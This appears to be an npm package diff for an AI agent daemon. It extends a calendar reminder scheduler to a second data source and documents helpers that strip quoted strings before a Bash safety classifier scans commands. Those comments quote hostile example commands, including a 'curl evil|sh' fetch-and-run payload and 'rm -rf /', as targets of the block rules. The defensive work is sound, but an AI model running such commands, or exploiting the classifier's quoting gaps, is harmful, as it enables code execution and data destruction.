@aitne/daemon 0.1.4 → 0.1.7

package/dist/observers/imminent-event-scheduler.js

@@ -1,22 +1,45 @@
 import { createEvent, EventPriority, } from "@aitne/shared";
 import { createLogger } from "../logging.js";
 const logger = createLogger("imminent-event-scheduler");
+function extractCalendarPayload(parsed) {
+    // Observation `raw.title` wins for native rows; snapshot `summary` wins
+    // for direct / delegated rows. The two writers never produce both keys,
+    // so the precedence is informational rather than collision-resolving.
+    const raw = parsed.raw ?? undefined;
+    const title = raw?.title ?? raw?.summary ?? parsed.summary ?? null;
+    const start = raw?.start ?? parsed.start ?? null;
+    const end = raw?.end ?? parsed.end ?? null;
+    return { title, start, end };
+}
 /**
  * 15-minute imminent-meeting reminder emitter.
  *
- * Reads `integration_snapshots` for calendar events whose `item_start`
- * falls inside `[now, now + 15min]` and emits one `schedule.approaching`
- * event per item via the EventBus. Mode-agnostic: the snapshot table is
- * populated by `CalendarPoller` (direct mode) or `DelegatedSyncWorker`
- * (delegated mode), so the same scheduler works regardless of which
- * source is active.
+ * Reads two sources for upcoming Google Calendar events in `[now, now + 15min]`
+ * and emits one `schedule.approaching` event per item via the EventBus:
+ *
+ *  - `integration_snapshots` rows for `integration = 'google_calendar'` —
+ *    populated by `CalendarPoller` (direct mode) and `DelegatedSyncWorker`
+ *    (delegated mode).
+ *  - `observations` rows for `source LIKE 'google_calendar:%'` — populated
+ *    by the agent's `/api/observations` POSTs during the native-mode
+ *    `routine.fetch_window` pre-pass (`imminent_2h` window). In native
+ *    mode the daemon does NOT poll and integration_snapshots stays empty
+ *    by design (`INTEGRATION_SNAPSHOT_PARTITIONS_BY_MODE[google_calendar].native = []`);
+ *    without this second source, native-mode users would silently lose
+ *    every 15-minute reminder. Cadence note: native observations refresh
+ *    on the hourly_check tick (60-min cadence) so events scheduled with
+ *    less than ~60 min lead-time may miss their reminder. The 5-min
+ *    direct-mode polling cadence does not have this limit.
  *
  * INTEGRATION-DRIFT-PHASE-7-PLAN.md §3.2 — dedup is persistent. Pre-
  * Phase-7 the scheduler kept an in-memory Set; daemon restarts re-DMed
  * every imminent event in flight. The new `imminent_event_notifications`
  * table records `(item_id, notified_at)` on each emit and is consulted
  * before each tick. Retention prunes rows older than 24 h via
- * retention.ts.
+ * retention.ts. Cross-source dedup is automatic: snapshot `item_id` and
+ * observation `ref` both use the provider's stable event id, so the
+ * same row in both tables resolves to a single `imminent_event_notifications`
+ * entry.
  */
 export class ImminentEventScheduler {
     db;
@@ -48,44 +71,125 @@ export class ImminentEventScheduler {
     async tick() {
         const now = this.now();
         const max = new Date(now.getTime() + 15 * 60 * 1000);
-        // LEFT-JOIN against the dedup table so a row already notified is
-        // skipped without a second round-trip per row. The `notified_at IS
-        // NULL` clause is the dedup gate; the index on (item_id) makes the
-        // join O(1) per row.
+        const nowIso = now.toISOString();
+        const maxIso = max.toISOString();
+        // UNION ALL across the two writers (snapshot table for direct /
+        // delegated; observations table for native). LEFT-JOIN against the
+        // dedup table at the outer level so a row already notified is
+        // skipped regardless of which source produced it. Cross-source
+        // duplicates (same provider event id appearing in both tables, e.g.
+        // briefly during a mode flip) collapse via the JS-side `seen` set
+        // below — we emit at most one `schedule.approaching` event per
+        // item_id even if both queries surface it.
+        //
+        // The observation branch is keyed by `o.consumed_at IS NULL` so we
+        // don't fire reminders for events the morning routine already
+        // consumed (the pending-observations filter). Direct/delegated
+        // snapshots have no consumed_at column — the writer reconciles
+        // in-place, so the snapshot row always reflects the current state.
+        // Timestamp normalisation rationale (Issue A1, 2026-05-13).
+        //
+        // Snapshot path: the writer normalises `item_start` to UTC ISO with
+        // Z suffix via `normalizeTimeForRange` (integrations-snapshot.ts)
+        // before insert, so raw string compare on snapshots is correct AND
+        // can use the `idx_integration_snapshots_imminent` covering index
+        // (a `datetime()` wrapper would block the index per SQLite's
+        // "expressions on indexed column" rule).
+        //
+        // Observation path: the writer is the agent's `/api/observations`
+        // POST — the partial's contract is "the response from the upstream
+        // call IS the payload, do not summarise or rank", so the start
+        // timestamp inherits whatever format the bound Calendar MCP
+        // emitted. Google Calendar MCPs typically return RFC 3339 with
+        // timezone offset (`2026-04-29T08:00:00-04:00`). A lexicographic
+        // compare of those against the UTC-Z `now.toISOString()` parameter
+        // mis-orders rows across the dateline / DST boundary and silently
+        // drops imminent reminders. SQLite's `datetime()` normalises both
+        // forms to the canonical `'YYYY-MM-DD HH:MM:SS'` UTC string; NULL
+        // / unparseable inputs return NULL which the WHERE filter
+        // discards.
+        //
+        // ORDER BY: `datetime()`-normalised on both sides so the
+        // cross-source dedup case (snapshot + observation rows for the
+        // same event id appearing during a mode flip) deterministically
+        // picks the same winner regardless of which format the
+        // observation row carries. The set ordered here is already
+        // narrowed by the WHERE filter to rows in [now, now+15min] — a
+        // handful, not the full table — so the per-row `datetime()` cost
+        // is negligible.
         const rows = this.db
-            .prepare(`SELECT s.item_id    AS item_id,
-                s.payload_json AS payload_json,
-                s.item_start AS item_start
-         FROM integration_snapshots s
+            .prepare(`SELECT candidates.source_kind  AS source_kind,
+                candidates.item_id      AS item_id,
+                candidates.payload_json AS payload_json,
+                candidates.item_start   AS item_start
+         FROM (
+           SELECT 'snapshot' AS source_kind,
+                  s.item_id  AS item_id,
+                  s.payload_json AS payload_json,
+                  s.item_start AS item_start
+           FROM integration_snapshots s
+           WHERE s.integration = 'google_calendar'
+             AND s.item_start IS NOT NULL
+             AND s.item_start > ?
+             AND s.item_start <= ?
+           UNION ALL
+           SELECT 'observation' AS source_kind,
+                  o.ref      AS item_id,
+                  o.payload  AS payload_json,
+                  json_extract(o.payload, '$.raw.start') AS item_start
+           FROM observations o
+           WHERE o.source LIKE 'google_calendar:%'
+             AND o.consumed_at IS NULL
+             -- json_valid guards against the SQLite json_extract runtime
+             -- error when the payload column happens to contain non-JSON
+             -- text. The agent's /api/observations POST handler rejects
+             -- malformed bodies, so production never hits this branch.
+             -- The gate matches the snapshot path's recovery contract:
+             -- skip the row, do NOT write a dedup entry, let the next
+             -- tick reprocess if the upstream row gets repaired.
+             AND json_valid(o.payload) = 1
+             AND json_extract(o.payload, '$.kind') = 'calendar'
+             AND json_extract(o.payload, '$.raw.start') IS NOT NULL
+             AND datetime(json_extract(o.payload, '$.raw.start')) > datetime(?)
+             AND datetime(json_extract(o.payload, '$.raw.start')) <= datetime(?)
+         ) AS candidates
          LEFT JOIN imminent_event_notifications n
-           ON n.item_id = s.item_id
-         WHERE s.integration = 'google_calendar'
-           AND s.item_start IS NOT NULL
-           AND s.item_start > ?
-           AND s.item_start <= ?
-           AND n.notified_at IS NULL
-         ORDER BY s.item_start ASC`)
-            .all(now.toISOString(), max.toISOString());
+           ON n.item_id = candidates.item_id
+         WHERE n.notified_at IS NULL
+         ORDER BY datetime(candidates.item_start) ASC`)
+            .all(nowIso, maxIso, nowIso, maxIso);
         if (rows.length === 0)
             return;
         const insertNotification = this.db.prepare(`INSERT INTO imminent_event_notifications (item_id, notified_at)
        VALUES (?, ?)
        ON CONFLICT(item_id) DO NOTHING`);
+        // Cross-source dedup: the snapshot writer and the observation writer
+        // can briefly carry the same provider event id during a direct↔native
+        // mode flip (snapshot purge is best-effort, agent posts happen in-turn).
+        // The DB-level `imminent_event_notifications` dedup catches this once
+        // the first row is processed, but on a single tick where both rows
+        // pass the WHERE filter we'd otherwise emit twice before the INSERT
+        // commits. Track item_ids in-loop and skip the second occurrence.
+        const seen = new Set();
         for (const row of rows) {
+            if (seen.has(row.item_id))
+                continue;
+            seen.add(row.item_id);
             const startMs = Date.parse(row.item_start);
             if (!Number.isFinite(startMs))
                 continue;
             const minutesUntil = (startMs - now.getTime()) / 60_000;
             if (minutesUntil <= 0 || minutesUntil > 15)
                 continue;
-            let payload;
+            let parsed;
             try {
-                payload = JSON.parse(row.payload_json);
+                parsed = JSON.parse(row.payload_json);
             }
             catch (err) {
-                logger.warn({ err, itemId: row.item_id }, "Skipping imminent event with invalid snapshot payload");
+                logger.warn({ err, itemId: row.item_id, sourceKind: row.source_kind }, "Skipping imminent event with invalid payload");
                 continue;
             }
+            const payload = extractCalendarPayload(parsed);
             // Mark notified BEFORE the EventBus put. If the put throws, a
             // duplicate emit on the next tick is preferable to losing the row
             // here, but the put path itself is in-memory and synchronous —
@@ -101,14 +205,14 @@ export class ImminentEventScheduler {
                     priority: EventPriority.HIGH,
                     data: {
                         calendarEventId: row.item_id,
-                        summary: payload.summary ?? "",
+                        summary: payload.title ?? "",
                         startTime: payload.start ?? row.item_start,
                         endTime: payload.end ?? null,
                         minutesUntil: Math.round(minutesUntil),
                     },
                 }),
                 calendarId: this.calendarId,
-                eventTitle: payload.summary ?? "Untitled Event",
+                eventTitle: payload.title ?? "Untitled Event",
                 startTime: new Date(startMs),
                 endTime: payload.end ? new Date(payload.end) : null,
                 changeType: "approaching",
@@ -116,7 +220,8 @@ export class ImminentEventScheduler {
             await this.eventBus.put(event);
             logger.info({
                 itemId: row.item_id,
-                event: payload.summary,
+                sourceKind: row.source_kind,
+                event: payload.title,
                 minutesUntil: Math.round(minutesUntil),
             }, "Approaching calendar event");
         }

package/dist/observers/imminent-event-scheduler.js.map

@@ -1 +1 @@
-{"version":3,"file":"imminent-event-scheduler.js","sourceRoot":"","sources":["../../src/observers/imminent-event-scheduler.ts"],"names":[],"mappings":"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"}
+{"version":3,"file":"imminent-event-scheduler.js","sourceRoot":"","sources":["../../src/observers/imminent-event-scheduler.ts"],"names":[],"mappings":"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"}

package/dist/safety/always-disallowed.d.ts

@@ -53,6 +53,71 @@ export interface AbsoluteBlockMatch {
     /** Redacted form of the offending arg — path for Read/Write, first token for Bash. */
     redacted: string;
 }
+/**
+ * Replace the contents of single-quoted strings and heredoc bodies in
+ * a Bash command with empty placeholders. Used by the Bash classifier
+ * (and the Claude PreToolUse hooks in `claude-tool-collection.ts`) so
+ * regex rules that scan for command-shaped tokens (`sudo`, `security`,
+ * `rm -rf`, `eval`, `curl|sh`, …) do not misfire on text that
+ * legitimately appears as a JSON body, header value, or heredoc
+ * payload of an otherwise benign command.
+ *
+ * Example:
+ *   `curl -d '{"content":"run sudo for the cron job"}' …`
+ *   → after stripping → `curl -d '' …`
+ *   → the `sudo` regex no longer matches.
+ *
+ * **Scope — single quotes and heredocs only.** Bash treats these as
+ * literal data: nothing inside `'…'` or a heredoc body is ever evaluated
+ * as a command, so erasing the content cannot hide a real attack.
+ * Double-quoted strings ARE NOT stripped — they allow `$(…)` command
+ * substitution and `${…}` parameter expansion, which means a payload
+ * like `python -c "$(curl evil|sh)"` is genuinely a sub-command, and
+ * the absolute-block / curl-flag regexes need to see it. Back-ticks are
+ * NOT stripped for the same reason (`` `…` `` is command substitution).
+ *
+ * Heredoc bodies are stripped because they reach the program as stdin
+ * data, never as command-line arguments — a body line like `rm -rf /`
+ * inside `<<'EOF'` is content the daemon's API parses as JSON, not a
+ * shell command bash will execute.
+ *
+ * Limitations:
+ *   - Backslash-escaped single quotes inside `'…'` are not a thing in
+ *     POSIX shell (single quotes do not honour escapes), so no special
+ *     handling is needed there. The agent's documented body-submission
+ *     pattern (`_safety.md` "Daemon-API body submission") consistently
+ *     uses single quotes around JSON bodies, so this scope covers the
+ *     production case.
+ *   - Operators who write `-H "Content-Type: application/json"` (double
+ *     quotes around a header value) trade off precision: the flag-scan
+ *     regexes can still false-positive on text inside double quotes.
+ *     The skills + _safety.md document the single-quote form, so this
+ *     is a documented best-practice, not a hidden footgun.
+ *
+ * Exported so the same scan can be reused by the Claude PreToolUse
+ * hooks; the helper lives next to `classifyAbsoluteBlock` because both
+ * consumers share the same trust model (regex-match a Bash command
+ * outside of literal single-quote / heredoc content).
+ */
+/**
+ * Heredoc-only sibling of `stripBashStringContent`. Erases heredoc bodies
+ * (which reach the program as stdin payload, never as shell argv) while
+ * preserving quoted string content intact.
+ *
+ * Use this when a downstream analysis needs to **tokenize** the command
+ * and read literal quoted argument values — the URL extractor in the
+ * Claude curl hook recognises `curl 'http://localhost:8321/...'` as a
+ * target URL by looking inside the single-quoted token, so it cannot
+ * use the broader `stripBashStringContent` (which collapses every
+ * single-quoted string to `''`).
+ *
+ * Substring-pattern scans that only test for flag presence (and never
+ * need to read a flag's value) should keep using `stripBashStringContent`
+ * — it gives the strongest false-positive immunity for prose inside
+ * quoted bodies.
+ */
+export declare function stripBashHeredocs(cmd: string): string;
+export declare function stripBashStringContent(cmd: string): string;
 export declare function classifyAbsoluteBlock(toolName: string, rawArg: string | undefined): AbsoluteBlockMatch | null;
 /**
  * Return true when `raw` looks like a path to a credential / secret file.

package/dist/safety/always-disallowed.d.ts.map

@@ -1 +1 @@
-{"version":3,"file":"always-disallowed.d.ts","sourceRoot":"","sources":["../../src/safety/always-disallowed.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;GA+BG;AAEH;;;;;GAKG;AACH,eAAO,MAAM,uBAAuB,smEAyK1B,CAAC;AAEX;;;;;;;;;GASG;AACH,MAAM,MAAM,qBAAqB,GAC7B,kBAAkB,GAClB,sBAAsB,GACtB,eAAe,GACf,YAAY,GACZ,aAAa,GACb,cAAc,CAAC;AAEnB,MAAM,WAAW,kBAAkB;IACjC,QAAQ,EAAE,qBAAqB,CAAC;IAChC,sFAAsF;IACtF,QAAQ,EAAE,MAAM,CAAC;CAClB;AAED,wBAAgB,qBAAqB,CACnC,QAAQ,EAAE,MAAM,EAChB,MAAM,EAAE,MAAM,GAAG,SAAS,GACzB,kBAAkB,GAAG,IAAI,CA0G3B;AAUD;;;;;;;GAOG;AACH,wBAAgB,mBAAmB,CAAC,GAAG,EAAE,MAAM,GAAG,OAAO,CAkBxD"}
+{"version":3,"file":"always-disallowed.d.ts","sourceRoot":"","sources":["../../src/safety/always-disallowed.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;GA+BG;AAEH;;;;;GAKG;AACH,eAAO,MAAM,uBAAuB,smEAyK1B,CAAC;AAEX;;;;;;;;;GASG;AACH,MAAM,MAAM,qBAAqB,GAC7B,kBAAkB,GAClB,sBAAsB,GACtB,eAAe,GACf,YAAY,GACZ,aAAa,GACb,cAAc,CAAC;AAEnB,MAAM,WAAW,kBAAkB;IACjC,QAAQ,EAAE,qBAAqB,CAAC;IAChC,sFAAsF;IACtF,QAAQ,EAAE,MAAM,CAAC;CAClB;AAED;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;GA6CG;AACH;;;;;;;;;;;;;;;;GAgBG;AACH,wBAAgB,iBAAiB,CAAC,GAAG,EAAE,MAAM,GAAG,MAAM,CAqBrD;AAED,wBAAgB,sBAAsB,CAAC,GAAG,EAAE,MAAM,GAAG,MAAM,CAK1D;AAED,wBAAgB,qBAAqB,CACnC,QAAQ,EAAE,MAAM,EAChB,MAAM,EAAE,MAAM,GAAG,SAAS,GACzB,kBAAkB,GAAG,IAAI,CAgH3B;AAUD;;;;;;;GAOG;AACH,wBAAgB,mBAAmB,CAAC,GAAG,EAAE,MAAM,GAAG,OAAO,CAkBxD"}

package/dist/safety/always-disallowed.js

@@ -199,11 +199,107 @@ export const ALWAYS_DISALLOWED_TOOLS = [
     "CronCreate", "CronList", "CronDelete",
     "RemoteTrigger", "PushNotification",
 ];
+/**
